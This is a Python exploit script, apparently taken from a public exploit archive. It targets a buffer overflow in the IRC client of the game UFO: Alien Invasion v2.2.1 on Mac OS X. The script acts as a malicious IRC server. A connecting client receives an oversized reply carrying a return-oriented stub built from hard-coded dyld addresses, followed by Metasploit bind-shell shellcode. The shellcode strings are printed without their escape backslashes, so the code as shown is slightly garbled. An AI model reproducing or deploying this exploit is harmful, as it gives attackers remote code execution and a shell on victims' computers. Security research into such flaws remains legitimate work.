#!/usr/bin/python
#
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
# Author: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
#
import sys, socket, struct

# msfpayload osx/x86/vforkshell_bind_tcp R | msfencode -b 'x00x0ax0d' -t c

shellcode = "x90" * 16
shellcode += ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1"
"x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06"
"xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6"
"x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d"
"xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c"
"x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f"
"x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82"
"xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee"
"xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1"
"x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6"
"x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32"
"x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45")

#### Exec Payload From Heap Stub (By Dino Dai Zovi) ####
frag0 = "x90x58x61xc3"
frag1 = "x90x58x89xe0x83xc0x0cx89x44x24x08xc3"

writeable = 0x8fe66448          # writeable memory location in /usr/lib/dyld
setjmp = 0x8fe1cf38             # t _setjmp in /usr/lib/dyld
strdup = 0x8fe210dc             # t _strdup in /usr/lib/dyld
jmpeax = 0x8fe01041             # jmp eax in /usr/lib/dyld

stub = frag0 + struct.pack('<III',setjmp,writeable+32,writeable) + 
frag1 + 'A' * 20 + struct.pack('<IIIII',setjmp,writeable+24,writeable,strdup,jmpeax) + 
'A' * 4

sploit = "001 :"
sploit += "x41" * 524
sploit += stub
sploit += shellcode
sploit += "x0dx0a"
#sploit = lead

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type <control>-c to exit.")
conn, addr = s.accept()
print '[*] Received connection from: ', addr

conn.send(sploit)
conn.close